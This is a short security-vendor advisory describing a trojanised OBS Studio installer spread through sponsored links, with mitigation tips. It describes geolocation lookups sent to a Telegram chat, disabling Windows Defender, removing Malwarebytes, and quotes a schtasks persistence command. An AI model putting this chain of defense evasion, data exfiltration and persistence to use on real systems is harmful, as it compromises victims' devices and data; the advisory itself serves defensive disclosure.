Malicious Open Broadcaster Software (OBS) Studio Being Delivered Through Paid Sponsored Links
Enterprotect is actively monitoring a new iteration of malware distribution through the use of sponsored links. Specifically, we have identified a malicious version of the popular Open Broadcaster Software (OBS) Studio being delivered through paid sponsored links. This is a sophisticated attack that is designed to compromise devices and steal sensitive information.
The initial stage of the installation uses cURL to obtain country, IP, and city details from IPiNfo.io as three separate communications. Once this information is acquired, it is sent to a Telegram chat using a hard-coded API account. This indicates that the attackers are using this information to target specific victims and may also be using it for future attacks.
Once the malware is installed, it systematically uses registry keys to disable core functionality, such as Windows Defender, and uninstall Malwarebytes. To ensure persistence, it creates a scheduled task: schtasks.exe /create /xml "C:\Users [username]\AppData\Roaming\obs-studio\bin\64bit\ar.xml"
It is important to note that Enterprotect’s SOC has seen indicators of compromise in our partners’ environments. This indicates that the attackers are actively targeting businesses and organizations, making it even more important to take steps to protect yourself.
To mitigate the risk of infection, we recommend the following:
Ensure you are accessing websites directly. Advertisements and affiliate links may lead to malicious websites.
Only download software from legitimate websites and sources.
If a paid software is being offered for free or at a discounted price, there is a higher chance it’s malicious.
Enterprotect’s SOC will continue to actively monitor for any indicators of compromise associated with this vulnerability. We will also provide updates and additional information as it becomes available.
In conclusion, the distribution of malware through sponsored links is a sophisticated and evolving threat. It is important to remain vigilant and take steps to protect yourself and your organization from this type of attack. By following the recommendations above and staying informed about the latest threats, you can reduce the risk of infection and protect your sensitive information.